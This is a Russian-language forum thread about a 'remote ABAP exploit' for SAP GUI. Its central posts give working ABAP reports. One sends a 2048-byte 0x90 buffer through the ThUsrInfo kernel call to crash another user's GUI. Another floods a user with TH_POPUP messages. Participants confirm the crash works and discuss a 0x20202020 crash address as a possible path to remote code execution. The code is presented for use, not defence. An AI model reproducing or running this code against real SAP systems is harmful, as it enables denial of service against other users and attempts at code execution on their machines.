Remote ABAP Exploit для SAP GUI

vvvictor

Skif написал:

"..было время и цены снижались.."

И текли, куда надо, каналы
И в конце куда надо впадали....

В.С. Высоцкий "Баллада о трудном детстве"
http://www.kulichki.com/vv/pesni/chas-zachatya-ya-pomnyu.html

Skif

vvvictor написал:

Zharik написал(а):

Если ты программер - да. :lol:

Если кодер - то просто придерживаться принципов оптимального кодирования :lol:

Иногда приходится в такие места залезать :!:

А творчество, в нашем деле, должно быть востребованно, оправданно и максимально безопасно. Это на руки можно надеть презерватив ответственности, а вот тем - из-за кого приходится лезть в дебри и не всегда безопасно - такой презик на мозги не натянешь :cry:

не так
отвественность/творчество
админ 90/10
пр-ст 10/90
(c)Skif
Но это больше для собеседования - чтобы максимизировать выработку впоследствии

Zharik

Цитата:

Но это больше для собеседования - чтобы максимизировать выработку впоследствии

Немножко не понял к чему собеседование.

vvvictor

Skif написал:

отвественность/творчество
админ 90/10
пр-ст 10/90
(c)Skif
Но это больше для собеседования - чтобы максимизировать выработку впоследствии

100%

Skif

Zharik написал(а):

Цитата:

Но это больше для собеседования - чтобы максимизировать выработку впоследствии

Немножко не понял к чему собеседование.

Потому что абап и админство (вспомнилось гоблинский властелин))) - в порядке хобби - негоже старикам у молодёжи хлеб отнимать. А "собеседование" (не путать с рекрутёрским) - ну должность такая - текучка большая однако.
вот ещё один копирайт могу подарить:
Нет сегодняшних проблем - есть вчерашние ошибки" (на стене висит)

vvvictor

Skif написал:

вот ещё один копирайт могу подарить:
Нет сегодняшних проблем - есть вчерашние ошибки" (на стене висит)

50/50, хотя в принципе все так
:lol:

holocron

Интересная оказывается тема, если копать проблему дальше. Жаль нет дебаггера, но кажется тут дело идет до Remote Code Execution. :twisted:

С успехом можно попробовать сорвать стек и выполнить на удаленной машине все, что захочется

в поле user добавил obligatory умышленно, ибо если запустить с пустым полем действует как оружие массового опорожнения.

Гуя в предсмертных судорогах пытается написать создателю (@sap.com) о случившемся

Code:

report z_gui_exploit.

include tskhincl.

parameters client like sy-mandt default sy-mandt.
parameters user like sy-uname obligatory default sy-uname.

data message(2048).
data xmes(2048) type x.
data message_len type sy-index.
data loc_cut_blanks type sy-langu value 0.
field-symbols <mes> type c.

start-of-selection.
  message_len = 2048.

  xmes(1) = '90'.
  clear xmes with xmes(1).
  assign xmes to <mes> casting type c.

  call 'ThUsrInfo'
    id 'OPCODE' field opcode_send_pop_up
    id 'CLIENT' field client
    id 'USR' field user
    id 'MSG' field <mes>
    id 'MSG_LEN' field message_len
    id 'CUT_BLANKS' field loc_cut_blanks.

Skif

holocron написал(а):

не помню, публиковал или нет, но вот сей код вышибает режим у пользователя без предупреждений

проверено на 4.6с + GUI up to 6.20. Иногда атакуемая машинка пищит

Code:

report z_gui_exploit.

parameters uname type sy-uname obligatory.
parameters text type sm04dic-popupmsg.
parameters times type i default 50.
parameters mandt type sy-mandt default sy-mandt.

start-of-selection.
  do times times.
  call function 'TH_POPUP'
    exporting
      client = mandt
      user = uname
      message = text
    exceptions                                                              
      user_not_found = 1
      others = 2.
  enddo.

нифига не валит (( Открывается 3-5 окошек и всё...(40b)

RoadRunner

Зато код холокорна сработал на "ура!", только вместо

Code:

data xmes(2048) type x.

пришлось написать просто

Code:

data xmes(2048).

Иначе не компилировалось.

Skif

RoadRunner написал:

Зато код холокорна сработал на "ура!", только вместо

Code:

data xmes(2048) type x.

пришлось написать просто

Code:

data xmes(2048).

Иначе не компилировалось.

]
пробуем..))

Skif

RoadRunner написал:

Зато код холокорна сработал на "ура!", только вместо

Code:

data xmes(2048) type x.

пришлось написать просто

Code:

data xmes(2048).

Иначе не компилировалось.

"CASTING" is not expected. (( 40b старушка...

holocrоn

раз так.. в качестве параметра скорми функции не <mes>, а пустую строку длинной 2048.

Skif

holocrоn написал(а):

раз так.. в качестве параметра скорми функции не <mes>, а пустую строку длинной 2048.

вот млин, начальник транспортного цеха ушёл уже... (админ транспорта))

Гость

Skif написал:

holocrоn написал(а):

раз так.. в качестве параметра скорми функции не <mes>, а пустую строку длинной 2048.

вот млин, начальник транспортного цеха ушёл уже... (админ транспорта))

всё ок. валит. )) впишу в заголовок автора ))

holocrоn

польщен )) Однако... написание полноценного эксплоита мне не под силу (полномочий нет

) Как вы понимаете дыркой можно пользоваться и без АБАПа. вот только без SoftICE сложно сказать, возможен ли Remote Execution или нет. когда строку чар пустую подсовываешь - адрес падения 0х20202020

т.е. пробелами перезаписан. а значит, что есть вероятность успешной инъекции кода.

просто DoS-атака - не спортивно

Если SAP - месть немцев за проигрыш в войне (как писали в соседнем треде), то это месть за дедушку

Правила форума

Remote ABAP Exploit для SAP GUI

Кто сейчас на конференции